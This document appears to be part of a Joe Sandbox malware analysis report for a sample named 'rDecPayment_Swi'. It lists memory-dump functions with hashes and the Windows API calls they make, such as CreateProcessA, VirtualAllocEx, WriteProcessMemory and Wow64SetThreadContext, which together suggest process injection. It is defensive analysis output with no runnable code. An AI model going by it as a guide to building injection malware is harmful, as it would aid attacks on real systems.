                                            control_flow_graph 2207 5e3ae60-5e3aebc 2212 5e3aec2-5e3aed4 2207->2212 2213 5e3b03a-5e3b0a6 2207->2213 2216 5e3aed6-5e3af22 2212->2216 2217 5e3af24-5e3af6d 2212->2217 2225 5e3b2f5-5e3b2fc 2213->2225 2226 5e3b0ac-5e3b0b5 2213->2226 2249 5e3af70-5e3afb0 2216->2249 2217->2249 2229 5e3b0b7-5e3b0bb 2226->2229 2230 5e3b12b-5e3b144 2226->2230 2231 5e3b0d4-5e3b0e0 2229->2231 2232 5e3b0bd-5e3b0d2 2229->2232 2241 5e3b271-5e3b281 2230->2241 2242 5e3b14a 2230->2242 2235 5e3b0e9-5e3b126 2231->2235 2232->2235 2235->2225 2251 5e3b283-5e3b298 2241->2251 2252 5e3b29a-5e3b2a6 2241->2252 2245 5e3b151-5e3b194 2242->2245 2246 5e3b1e1-5e3b224 2242->2246 2247 5e3b199-5e3b1dc 2242->2247 2248 5e3b229-5e3b26c 2242->2248 2245->2225 2246->2225 2247->2225 2248->2225 2263 5e3afb2-5e3afb8 2249->2263 2264 5e3afba-5e3afc4 2249->2264 2258 5e3b2af-5e3b2f0 2251->2258 2252->2258 2258->2225 2265 5e3afc7-5e3afe0 2263->2265 2264->2265 2268 5e3afe7-5e3b00a 2265->2268 2272 5e3b030-5e3b037 2268->2272 2273 5e3b00c-5e3b028 2268->2273 2273->2272
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q$paq
                                            • API String ID: 0-4101361271
                                            • Opcode ID: 3e660a19c1e5d1aab5bbc020788955ac00de95466d1ce56136e817579e9f03a5
                                            • Instruction ID: 46f65a67e3e99188e2a37be50abebec76eaafb898122a4fdca3d74b51c550d92
                                            • Opcode Fuzzy Hash: 3e660a19c1e5d1aab5bbc020788955ac00de95466d1ce56136e817579e9f03a5
                                            • Instruction Fuzzy Hash: FB41F270A402059FD708DF69D941BAFBBBBFF84304F108928D04A97355EB79E906CBA1
                                            Function 05D717C5 Relevance: 1.9, Strings: 1, Instructions: 681COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334491048.0000000005D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5d70000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q
                                            • API String ID: 0-1259897404
                                            • Opcode ID: 396b74f20b7257343a264a2181dfe4a8eb6024c30ff41e6151f62c02b5b0d754
                                            • Instruction ID: bea18a0bc7ffe9c93ca58180b6a302ba76ebd5c8705c57fac208d8330d17625e
                                            • Opcode Fuzzy Hash: 396b74f20b7257343a264a2181dfe4a8eb6024c30ff41e6151f62c02b5b0d754
                                            • Instruction Fuzzy Hash: 88426F7591E3889FD7178BB48C69B9A3F75AF07301F1941DBE1809B2E3D2795809CB22
                                            Function 05E3C740 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,aq
                                            • API String ID: 0-3092978723
                                            • Opcode ID: 3c78adb1ddadbea9cb087299a258e18c1a2eaa09e5a70f0bf09c61e9eecfedc2
                                            • Instruction ID: b4cdddc9802bdc7c3e5e75d99c5b6b1bbdcd83f0d74a9636948d4de1b8fd7644
                                            • Opcode Fuzzy Hash: 3c78adb1ddadbea9cb087299a258e18c1a2eaa09e5a70f0bf09c61e9eecfedc2
                                            • Instruction Fuzzy Hash: 55521775A002298FDB24CF69C985BEDBBF6BF88300F1581D9E549A7351DA309E81CF61
                                            Function 05E36C93 Relevance: 1.8, Strings: 1, Instructions: 532COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (_]q
                                            • API String ID: 0-188044275
                                            • Opcode ID: a0d30291381a35339430654702031b02e2370cbaf35d70222bdaa76f86091793
                                            • Instruction ID: 393a6bca4af6a8c160c0a031d2dd2b193b3cea3cacaa78a92bcc776f9d9bbb89
                                            • Opcode Fuzzy Hash: a0d30291381a35339430654702031b02e2370cbaf35d70222bdaa76f86091793
                                            • Instruction Fuzzy Hash: 44229F71A00215DFEB14CF68D496AADBBF2FF88344F148059E946AB3A1DB71ED41CB90
                                            Function 0615207E Relevance: 1.8, APIs: 1, Instructions: 265processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 061522EF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 3ffe1ca9e0483c7da315f70b268c7627ee5b4a64e6d63fdef8ca635abee37723
                                            • Instruction ID: 7ac17ac0641c2933e92a09619b21eede6dac13f3ae1d9b637c1d72db91ab0650
                                            • Opcode Fuzzy Hash: 3ffe1ca9e0483c7da315f70b268c7627ee5b4a64e6d63fdef8ca635abee37723
                                            • Instruction Fuzzy Hash: DEA1F371D00218CFDB64CFA9C8857EEFBB1BF09300F159569E868A7240DB759A85CF85
                                            Function 06152088 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 061522EF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 6003d1aace525454ff2f4d44e32572ae7b01622f5cbbd5d352a559d3d7896e0d
                                            • Instruction ID: 2c41ae6a4ce809f9c5deaa8ddb8fbc0a238cefcea735f22505255d8cf579a379
                                            • Opcode Fuzzy Hash: 6003d1aace525454ff2f4d44e32572ae7b01622f5cbbd5d352a559d3d7896e0d
                                            • Instruction Fuzzy Hash: AFA1F2B5D00218CFDB64CFA9C8857EEFBB1BF09300F159169E868A7240DB759A85CF85
                                            Function 060F6E14 Relevance: 1.7, APIs: 1, Instructions: 172fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CopyFileA.KERNEL32(?,?,?), ref: 060F6F9B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335730568.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60f0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: CopyFile
                                            • String ID:
                                            • API String ID: 1304948518-0
                                            • Opcode ID: 9ffe80897c022b7516829f16e2ba1a48702fa7b0c7a37ec4a9596f96a31ec942
                                            • Instruction ID: 72edaf2e3ae5df76addcc855641234a9468c517472f185201ecf9ff901506b0d
                                            • Opcode Fuzzy Hash: 9ffe80897c022b7516829f16e2ba1a48702fa7b0c7a37ec4a9596f96a31ec942
                                            • Instruction Fuzzy Hash: B66112B1D602198FDB90CFA9D9457ADBFF1BF49304F248129E814A7280DB799985CF81
                                            Function 060F6E20 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CopyFileA.KERNEL32(?,?,?), ref: 060F6F9B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335730568.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60f0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: CopyFile
                                            • String ID:
                                            • API String ID: 1304948518-0
                                            • Opcode ID: a4c046d0b6898064d8dd24f14b867a942758984af1e8a214a679f955d7330a9e
                                            • Instruction ID: 291cb7be3203815adc4b849546b9407c95d829a951222dc27b4c8b1a49428eec
                                            • Opcode Fuzzy Hash: a4c046d0b6898064d8dd24f14b867a942758984af1e8a214a679f955d7330a9e
                                            • Instruction Fuzzy Hash: 746112B1D602198FDB90CFA9C9457ADBBF1BF49300F248129E814A7280DB799985CF81
                                            Function 061536E8 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 061537C3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 6d09a7adc3fc54cbc9d04bd928b440a3706bdb8e42322535ef9b5212d3adb190
                                            • Instruction ID: ed4612e82c712c34c3ad0a12128503baf55093386a804654654d51b49121012e
                                            • Opcode Fuzzy Hash: 6d09a7adc3fc54cbc9d04bd928b440a3706bdb8e42322535ef9b5212d3adb190
                                            • Instruction Fuzzy Hash: 1941ABB4D01258DFCB10CFA9D984AEEFBF1BB49310F14942AE818B7250D739AA45CF64
                                            Function 061536F0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 061537C3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 466d84a44bdceef5dd812a029c4fd9affbedc8e6030bebad6e290851f64b5b26
                                            • Instruction ID: be658fd80e6561dd4c0acd213b84ade7ddba9849f80d6d27f96b229ae6c1b431
                                            • Opcode Fuzzy Hash: 466d84a44bdceef5dd812a029c4fd9affbedc8e6030bebad6e290851f64b5b26
                                            • Instruction Fuzzy Hash: 21419BB5D01258DFCB00CFA9D984ADEFBF1BB49310F14942AE818B7210D739AA45CF64
                                            Function 06152FE8 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0615309A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: cccf8df1a5bcfd2c822296c64df9ca5703291e6caba1e890cc0b6c955ab49f37
                                            • Instruction ID: 53eb795269dbabdb58ea9075cbc084f45ebd328e0619c50bc0abe647144a0967
                                            • Opcode Fuzzy Hash: cccf8df1a5bcfd2c822296c64df9ca5703291e6caba1e890cc0b6c955ab49f37
                                            • Instruction Fuzzy Hash: 6D3197B8D00258DFCF10CFA9D984A9EFBB5BB49310F10942AE825B7210D735A945CFA5
                                            Function 06152FF0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0615309A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: c28f1c6c5079581b01fb6bf619722521ec33afe3a078ee45fe49ccb1a7866294
                                            • Instruction ID: 9e7701c2ca0f87c23ffc00a7968111613ffb6db361fe8fa6025448175a37a707
                                            • Opcode Fuzzy Hash: c28f1c6c5079581b01fb6bf619722521ec33afe3a078ee45fe49ccb1a7866294
                                            • Instruction Fuzzy Hash: FF3188B9D00258DFCF10CFA9D984A9EFBB5BB49310F10942AE825B7210D735A945CF65
                                            Function 06152938 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 061529EF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 15156440d8cd511b01b6c0f15c507f90c3fbda8e9b199dd97f5aeaf3270134c3
                                            • Instruction ID: 72aa8a3bf4f405c9dadcd2af79bb4c2f38a2aedc4b460564db8157b4b2a39c08
                                            • Opcode Fuzzy Hash: 15156440d8cd511b01b6c0f15c507f90c3fbda8e9b199dd97f5aeaf3270134c3
                                            • Instruction Fuzzy Hash: 2141CEB5D01258DFCB14CFA9D984AEEFBF1BB49310F14802AE419B7240C738A945CFA4
                                            Function 0116FC90 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 0116FD34
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2313440096.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1160000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 7c18890bdc4420245dbba4eb1476f91d16e915686d6d2058ca899385564fa6ae
                                            • Instruction ID: 793348ab6f7644ab18e6bcd14359917df32c62754781f0e04f94bec475ab430a
                                            • Opcode Fuzzy Hash: 7c18890bdc4420245dbba4eb1476f91d16e915686d6d2058ca899385564fa6ae
                                            • Instruction Fuzzy Hash: 0A31A8B4D012489FCB14CFA9D980ADEFBB5BF49310F10942AE818B7210D735A946CFA4
                                            Function 06152940 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 061529EF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: c8692c8377fd3849678a92905f410c9e80b12f744e2dfabcebbe6ce1212c759b
                                            • Instruction ID: 4388670cfc37beb3e583e5947da31095b90ab4f46ddbc1d58808aacdfa4070d7
                                            • Opcode Fuzzy Hash: c8692c8377fd3849678a92905f410c9e80b12f744e2dfabcebbe6ce1212c759b
                                            • Instruction Fuzzy Hash: D031ACB5D00258DFCB14CFA9D984AEEFBF1BB49310F14802AE819B7250D738A945CF94
                                            Function 060DC500 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 187acf81baf1525ac156790bb57d7676fe0b9a2a9285959368893cca184c12e0
                                            • Instruction ID: 6bd77b36d5b1fa36f8a756da6e68e3c2af1204a9b184d96c4885cd67a7d892f2
                                            • Opcode Fuzzy Hash: 187acf81baf1525ac156790bb57d7676fe0b9a2a9285959368893cca184c12e0
                                            • Instruction Fuzzy Hash: 9B31BBB5D012189FDB10CFA9D985AAEFBF5BF09310F14842AE814B7200D739A945CFA4
                                            Function 060DC508 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: d319c0fe2277d8015444e810cb891419238eeb2f139f084d38379b2b68261c24
                                            • Instruction ID: bc35f187115623fa4ff325c7e3e025148a4c8cd37ef241e8cd668ccaa9cc4769
                                            • Opcode Fuzzy Hash: d319c0fe2277d8015444e810cb891419238eeb2f139f084d38379b2b68261c24
                                            • Instruction Fuzzy Hash: 4731AAB4D012189FDB10CFA9D984AEEFBF5BF49310F14942AE815B7240D739A945CFA4
                                            Function 05E3B85B Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q
                                            • API String ID: 0-1259897404
                                            • Opcode ID: f0d6780235aa2f75297d35d7c2fb60897d873b5b2ef4dd6a4219a03499b8027e
                                            • Instruction ID: 24988c41d685dfdad9a982e701f1a8406ccc2e4e419f3064bf20bfef36497b6a
                                            • Opcode Fuzzy Hash: f0d6780235aa2f75297d35d7c2fb60897d873b5b2ef4dd6a4219a03499b8027e
                                            • Instruction Fuzzy Hash: 71A1FB34B10218CFDB04EFA4D899A9DBBB6FF88300F559169E446AB365DF71AC42CB50
                                            Function 05E324B0 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (aq
                                            • API String ID: 0-600464949
                                            • Opcode ID: a8719108cd79ab8cf761689f41ca96c52d4dd12c304eb351ea430bdc928b5b01
                                            • Instruction ID: 88336e6b767082225b35f9a1ab5afcd2952827ae5b38956a0b27f8150d99c598
                                            • Opcode Fuzzy Hash: a8719108cd79ab8cf761689f41ca96c52d4dd12c304eb351ea430bdc928b5b01
                                            • Instruction Fuzzy Hash: DD51F039A00616DFCB00CF58C489A6AFBB2FF84324F15816AEA959B351C730F942CBD4
                                            Function 05E314F8 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: paq
                                            • API String ID: 0-3273118895
                                            • Opcode ID: 58e560d338677f5d4ee36369710632e7277e763a969dd6b385789cc5860e3752
                                            • Instruction ID: 73af28673fdc1dccb09a9b662d72be0c5f31dec9a68feeb249b6bc2bd54c9efe
                                            • Opcode Fuzzy Hash: 58e560d338677f5d4ee36369710632e7277e763a969dd6b385789cc5860e3752
                                            • Instruction Fuzzy Hash: DB517C76600100AFCB4A9FA9D945D6A7BB7FF8C3147198098E2098B376DA32CC21EB50
                                            Function 05E3F4F9 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q
                                            • API String ID: 0-1259897404
                                            • Opcode ID: fdcd82c1669f89c28339810a0977f7dfef1c8953033f2276983b7290bf67c3c9
                                            • Instruction ID: 72758f9a290e2a643b09899db199bfa15cc29010cc546bfbb0ab3a0a57629246
                                            • Opcode Fuzzy Hash: fdcd82c1669f89c28339810a0977f7dfef1c8953033f2276983b7290bf67c3c9
                                            • Instruction Fuzzy Hash: AB415230B106148FCB14EB65C499AAEB7BBEF88700F105529E443AB3A4CF799D06CB91
                                            Function 05E3EF03 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q
                                            • API String ID: 0-1259897404
                                            • Opcode ID: 9b419268219931d4c1f08597f6cb7bd05664c1008769e8d6c2032408dfc6faf8
                                            • Instruction ID: 903478b6c2561e5101f04f5f2bc99c862a1f5e3571cf3a04dea4f4cb15a8dc4d
                                            • Opcode Fuzzy Hash: 9b419268219931d4c1f08597f6cb7bd05664c1008769e8d6c2032408dfc6faf8
                                            • Instruction Fuzzy Hash: 57314C353406109FE308DB69C999F6A77EBAFCC704F104568E64A8B3A5CE75EC02CB91
                                            Function 05E3EF10 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q
                                            • API String ID: 0-1259897404
                                            • Opcode ID: a0900cdebc826cdd21a04b8a5ba0b67547aa8eff3d3d218fd6ea741dbcba6ab7
                                            • Instruction ID: 131ae6a1e722b710dd809e9a5e5e19f2df97897cc9f6961d76e8b0d9c162c0ae
                                            • Opcode Fuzzy Hash: a0900cdebc826cdd21a04b8a5ba0b67547aa8eff3d3d218fd6ea741dbcba6ab7
                                            • Instruction Fuzzy Hash: 96314D353406109FD308DB69C999F6A77EBAFCC704F104968E6468B3A5CE75EC02CB91
                                            Function 05E31DA8 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (aq
                                            • API String ID: 0-600464949
                                            • Opcode ID: 1753da9b6ff1785e7cca9273a0a34a8edd52289b21d61f7b05b7d82fba05c6ec
                                            • Instruction ID: 2b0cbc37a8bcf28edba95e74ac85e2d8163124401fec0ff60b8eaeef77dde21b
                                            • Opcode Fuzzy Hash: 1753da9b6ff1785e7cca9273a0a34a8edd52289b21d61f7b05b7d82fba05c6ec
                                            • Instruction Fuzzy Hash: 012104363001469BE7085F69D894AAE7BA7EFC9364B14803EF909CB350CE728C01C790
                                            Function 05E3A8D8 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q
                                            • API String ID: 0-1259897404
                                            • Opcode ID: 8324492591635e1315ae5dc1609fe62a16098dae758a4a655bea7a60bf6aefec
                                            • Instruction ID: 89eb871ffd80d0f8e0c9d4b64eebe014a0b218977dba9d3a2331ff9bc98c0b1d
                                            • Opcode Fuzzy Hash: 8324492591635e1315ae5dc1609fe62a16098dae758a4a655bea7a60bf6aefec
                                            • Instruction Fuzzy Hash: DC219135B00100DFDF199F98D994A9D7BBBFF88310B054069E506AB365DA75EC06CB51
                                            Function 05E35FF0 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: p<]q
                                            • API String ID: 0-1327301063
                                            • Opcode ID: 949a88c6deff9c914ae7965420ae8139890171d55909a608c9809204aa32fda4
                                            • Instruction ID: 78a50480113219969acff5eb91e5f83565d7ca9a918c0d49636f3e54051ccfef
                                            • Opcode Fuzzy Hash: 949a88c6deff9c914ae7965420ae8139890171d55909a608c9809204aa32fda4
                                            • Instruction Fuzzy Hash: 3C218E703081449FDB12CF6AC859AAA7BF6BF49345F194096F885CB2B1C635DC41DB20
                                            Function 05E5945C Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: =BKD
                                            • API String ID: 0-841463177
                                            • Opcode ID: 0b9525c24f511d094095ebfbd0ca607c433677c5f6984a52ee442edf93f276b2
                                            • Instruction ID: ec9c04439c1f1a727a90cb4bca3ded16642eca58ea62f61178576accfd7f369d
                                            • Opcode Fuzzy Hash: 0b9525c24f511d094095ebfbd0ca607c433677c5f6984a52ee442edf93f276b2
                                            • Instruction Fuzzy Hash: 7C11F3B4A4022A8FCB64DF24DD84AAEBBF1BF49301F4191E9D95AA7351DB305E80CF45
                                            Function 06214DC5 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: k
                                            • API String ID: 0-140662621
                                            • Opcode ID: a0ac1bf019d4d77f17cf34d954b310980ab8e815d1ffe500af09d93b27e2f2c6
                                            • Instruction ID: af15efa14cb5aec7207fb0d5bf78b8611b720108dd17d64dda1640644f23c369
                                            • Opcode Fuzzy Hash: a0ac1bf019d4d77f17cf34d954b310980ab8e815d1ffe500af09d93b27e2f2c6
                                            • Instruction Fuzzy Hash: 97F0A4746102298FCB58DB28D855E9ABBB1FB89741F14809AE949A7344DB39AE818F10
                                            Function 05E5D11F Relevance: 1.3, Strings: 1, Instructions: 9COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            • Opcode ID: c33cef909e92fd39fde4029981c80876f764b70773a9f19a3ef057263fbd15dd
